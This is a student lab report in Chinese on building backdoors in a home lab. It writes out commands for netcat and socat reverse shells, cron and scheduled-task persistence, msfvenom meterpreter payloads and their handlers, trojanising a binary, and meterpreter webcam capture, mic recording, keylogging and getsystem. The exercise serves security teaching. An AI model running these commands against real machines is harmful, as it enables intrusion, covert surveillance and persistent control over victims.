1.实验内容
1.1 实践目标
(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)
(2)使用socat获取主机操作Shell, 任务计划启动
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
1.2 问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
攻击者通过在网站上放置看似合法的恶意软件,用户下载并运行后,后门程序便会在系统中安装。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
Windows:通过安装一个恶意服务,利用services.msc来启动后门。
Linux:攻击者可以创建或修改系统的crontab任务,使后门程序定时运行。
(3)Meterpreter有哪些给你映像深刻的功能?
可以远程开启目标系统的摄像头或进行屏幕截取,获取敏感信息。
(4)如何发现自己有系统有没有被安装后门?
可以使用网络流量监控工具(如Wireshark)查看是否有未知的外部连接或异常端口打开。
2.实验过程
2.1 任务一 使用netcat获取主机操作Shell,cron启动某项任务(任务自定)
先ipconfig
查看一下主机的ip地址
然后使用netcat进行连接:
在kali输入命令:nc 192.168.43.214 2405 -e /bin/sh
在主机输入命令:nc.exe -l -p 2405
在主机命令行中输入ls
,能正常显示文件名,证明主机已成功获取shell
启动kali的root用户,输入crontab -e
,选择第二个/usr/bin/vim.basic
输入后进入文字编辑器,新增命令5 * * * * /bin/netcat 192.168.43.214 2405 -e /bin/sh****
这条命令是在每小时的第5分钟启动任务
输入命令crontab -l
查看任务
可以在/var/spool/cron/crontabs中找到root文件
然后在主机的中操作,输入:echo "* * * * * echo "chuzhehao" > /home/kali/20222405.txt" > /var/spool/cron/crontabs/root
每分钟执行一次用“chuzhehao”覆盖文件20222405.txt,再输入crontab -l检查时程表
查看修改之前的文件20222405.txt,内容是20222405
在kali中检查20222405.txt文件,内容成功修改为chuzhehao
2.2 任务二 使用socat获取主机操作Shell,任务计划启动
在主机中输入命令:socat.exe tcp-listen:2405 exec:cmd.exe,pty,stderr
在kali中输入命令:socat - tcp:192.168.43.214:2405
先编写一个程序
在kali中输入命令:schtasks /create /sc minute /mo 1 /tn "20222221chuzhehao" /tr C:\20222405\20222405.exe
每一分钟执行一次程序
回到主机查看正在运行的任务“20222405chuzhehao”,实验成功。
2.3 任务三 在Linux下使用MSF meterpreter生成可执行文件,利用ncat或socat传送到Windows主机并运行获取主机shell
先关闭防火墙
在kali中输入ifconfig
获得ip地址172.20.10.9
继续输入命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.245 LPORT=2405 -f exe > 20222405backdoor.exe
主机输入命令:nc 172.20.10.9 12345 >C:\socat\20222405backdoor.exe
kali输入命令nc -lvp 12345</tmp/20222405backdoor.exe
这样就将后门程序传到主机了
在Kali中输入命令msfconsole
,然后配置监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.20.10.9
set LPORT 2405
接着输入exploit
,运行监听模块,并在主机运行20222405backdoor.exe文件
在kali中输入ls
查看主机目录
2.4 任务四 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
接着任务三继续输入命令
record_mic
音频
screenshot
截屏
webcam_snap
拍照
keyscan_start
开始读取键盘记录
keyscan_dump
结束读取键盘记录
接下来尝试提权
继续输入
getuid
查看当前用户
getsystem
提权指令
2.5 任务五 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
在kali中输入命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.20.10.9 LPORT=2405 -x /home/kali/pwn1 -f elf > pwn2405
接下来赋予pwn2405权限
接下来重现监听过程
输入命令
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 172.20.10.9
set LPORT 2405
exploit
打开另一个终端输入命令./pwn2405
运行pwn2405
回到刚才的终端,输入ls确认连接,成功实现远程控制shell
3.问题及解决方案
问题1:后门程序无法传入主机
问题1解决方案:
kali输入命令:nc -lvp 12345</tmp/20222405backdoor.exe
主机输入命令:nc 172.20.10.9 12345 >C:\socat\20222405backdoor.exe
问题2:Kali中msf拿shell后中文乱码
问题2解决方案:输入chcp 65501即可
4.学习感悟、思考等
实验二的任务很多,顺着坐下来其实还算并比较顺利,但比较困扰我的是我在任务三卡了很长时间,试了很多种方法都没办法传输后门程序,于是只好换个思路试一下,好在最后成功了,但之前连接不上的原因我不是很清楚,也没有找到解决方法,这就比较玄学了,甚至有的时候遇到问题重启虚拟机问题就解决了,这个插曲困扰了我很长时间
通过这次实验我收获了很多,我学会了netcat、socat、msf等工具的用法,最让我印象深刻的是通过工具居然可以操控别人的摄像头,还能拍照,感觉非常的高级,同时也让我感觉到网络攻击其实离我们并没有那么遥远,所以我们要提高警惕,加强防范,避免隐私信息泄露。
标签:命令,kali,2024,2025,2405,20222405,主机,输入 From: https://www.cnblogs.com/20222405chu/p/18472635